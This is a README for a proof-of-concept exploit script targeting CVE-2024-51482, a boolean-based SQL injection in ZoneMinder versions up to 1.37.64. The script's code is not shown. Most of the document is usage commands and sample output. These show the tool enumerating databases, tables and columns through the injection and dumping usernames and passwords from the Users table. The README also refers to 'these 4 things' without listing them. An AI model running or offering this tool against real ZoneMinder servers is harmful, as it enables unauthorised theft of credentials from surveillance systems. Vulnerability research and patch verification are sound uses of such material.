# CVE-2024-51482 ZoneMinder v1.37.* <= 1.37.64
CVE-2024-51482 poc.py

By default, this script enumerates the `zm` database, pulls from the `Users` table, and dumps `Username+Password` columns.

If these 4 things exist, you will receive a username and password hash.

More detailed information on the Vulnerability can be found at the following link:
https://nvd.nist.gov/vuln/detail/CVE-2024-51482
```
ZoneMinder is a free, open source closed-circuit television software application.
ZoneMinder v1.37.* <= 1.37.64 is vulnerable to boolean-based SQL Injection in function of web/ajax/event.php.
This is fixed in 1.37.65.
```


## Disclaimer:
This script is for educational use only. 

Do not use it for illegal purposes. 

If you do, it’s entirely your responsibility; I am not liable for any misuse.


## Usage

Default check of ZM database, Users table, Username+Password columns
```
python3 poc.py -i 127.0.0.1
[*] Enumerating database 'zm.Users'
[!] Found User and Password :
root:password123
```

Manually go through the Database, tables and columns
```
python3 poc.py -i 127.0.0.1 --discovery
[*] Extracting all database names:
information_schema
zm
[*] No more databases found

[+] Successfully extracted database names:
1) information_schema
2) zm

Select database to enumerate tables [1-2]: 2

[*] Extracting tables from database 'zm':
Snapshots_Events
Maps
Events_Week
Object_Types
Models
MontageLayouts
Monitor_Status
Event_Data
States
TriggersX10
Storage
Logs
Snapshots
Reports
Groups
Tags
ControlPresets
Users
Events_Month
Groups_Permissions
Server_Stats
Filters
Frames
Events_Day
Groups_Monitors
Monitors
Zones
Stats
Devices
User_Preferences
Monitors_Permissions
Config
Sessions
Events_Archived
Controls
ZonePresets
MonitorPresets
Events
Manufacturers
Event_Summaries
Servers
Events_Tags
Events_Hour
[*] No more tables found in database 'zm'

[+] Successfully extracted tables in database 'zm':
1) Snapshots_Events
2) Maps
3) Events_Week
4) Object_Types
5) Models
6) MontageLayouts
7) Monitor_Status
8) Event_Data
9) States
10) TriggersX10
11) Storage
12) Logs
13) Snapshots
14) Reports
15) Groups
16) Tags
17) ControlPresets
18) Users
19) Events_Month
20) Groups_Permissions
21) Server_Stats
22) Filters
23) Frames
24) Events_Day
25) Groups_Monitors
26) Monitors
27) Zones
28) Stats
29) Devices
30) User_Preferences
31) Monitors_Permissions
32) Config
33) Sessions
34) Events_Archived
35) Controls
36) ZonePresets
37) MonitorPresets
38) Events
39) Manufacturers
40) Event_Summaries
41) Servers
42) Events_Tags
43) Events_Hour

Select table to enumerate columns [1-43]: 18

[*] Extracting columns from table 'Users' in database 'zm':
Id                   int(10) unsigned
Username             varchar(64)
Password             varchar(64)
Name                 varchar(64)
Email                varchar(64)
Phone                varchar(64)
Language             varchar(8)
Enabled              tinyint(3) unsigned
Stream               enum('None','View')
Events               enum('None','View','Edit')
Control              enum('None','View','Edit')
Monitors             enum('None','View','Edit','Cre
Groups               enum('None','View','Edit')
Devices              enum('None','View','Edit')
Snapshots            enum('None','View','Edit')
System               enum('None','View','Edit')
MaxBandwidth         varchar(16)
TokenMinExpiry       bigint(20) unsigned
APIEnabled           tinyint(3) unsigned
HomeView             varchar(64)
[*] No more columns found in table 'Users'

[+] Columns in table 'Users':
Column Name          Type
----------------------------------------
1) Id                   int(10) unsigned
2) Username             varchar(64)
3) Password             varchar(64)
4) Name                 varchar(64)
5) Email                varchar(64)
6) Phone                varchar(64)
7) Language             varchar(8)
8) Enabled              tinyint(3) unsigned
9) Stream               enum('None','View')
10) Events               enum('None','View','Edit')
11) Control              enum('None','View','Edit')
12) Monitors             enum('None','View','Edit','Cre
13) Groups               enum('None','View','Edit')
14) Devices              enum('None','View','Edit')
15) Snapshots            enum('None','View','Edit')
16) System               enum('None','View','Edit')
17) MaxBandwidth         varchar(16)
18) TokenMinExpiry       bigint(20) unsigned
19) APIEnabled           tinyint(3) unsigned
20) HomeView             varchar(64)

Select columns to dump data (comma-separated) [1-20] or press Enter to skip: 2,3

[*] Dumping data from column 'Username' in table 'Users' of database 'zm':
root

[*] Dumping data from column 'Password' in table 'Users' of database 'zm':
password123
             
```
